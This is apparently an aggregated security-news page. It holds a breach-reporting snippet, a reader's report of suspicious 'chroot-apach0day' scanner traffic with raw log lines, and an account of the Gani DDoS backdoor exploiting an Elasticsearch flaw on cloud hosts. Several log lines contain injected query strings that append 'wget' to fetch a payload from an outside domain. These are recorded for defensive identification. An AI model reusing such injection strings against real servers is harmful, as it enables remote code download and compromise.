Information Security News
What InfoSec can learn from the insurance industry
iT News (blog)
That kind of raw data - rather than the vendor-sponsored and spun surveys that nobody trusts - would make life a great deal easier for my infosec acquaintance and colleagues. It also makes(yet another) strong case for mandatory data breach reporting.
Our reader Robin submitted the following detect:
I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day Â
The URL that appears to be retrieved does not exist, even though the domain does.
In our own web logs, we have seen a couple of similar requests:
126.96.36.199 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
188.8.131.52 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
184.108.40.206 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day"Â
There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
Attackers have figured out a new way to get Amazon's cloud service to wage potent denial-of-service attacks on third-party websites—by exploiting security vulnerabilities in an open source search and analytics application known as Elasticsearch.
The power of Backdoor.Linux.Ganiw.a was documented earlier this month by researchers from antivirus provider Kaspersky Lab. Among other things, the trojan employs DNS amplification, a technique that vastly increases the volume of junk traffic being directed at a victim by abusing poorly secured domain name system servers. By sending DNS queries that are malformed to appear as if they came from the victim domain, DNS amplification can boost attack volume by 10-fold or more. The technique can be especially hard to block when distributed among thousands or hundreds of thousands of compromised computers.
Late last week, Kaspersky Lab expert Kurt Baumgartner reported that the DDoS bot is actively compromising Amazon Elastic Cloud Computing (EC2) hosts and very possibly those of competing cloud services. The foothold that allows the nodes to be hijacked is a vulnerability in 1.1.x versions of Elastisearch, he said. The attackers are modifying proof-of-concept attack code for the vulnerability, indexed as CVE-2014-3120 in the Common Vulnerabilities and Exposures database, that gives them the ability to remotely execute powerful Linux commands through a bash shell Window. The Gani backdoor, in turn, installs several other malicious scripts on compromised computers, including Backdoor.Perl.RShell.c and Backdoor.Linux.Mayday.g. The Mayday backdoor then floods sites with data packets based on the user datagram protocol.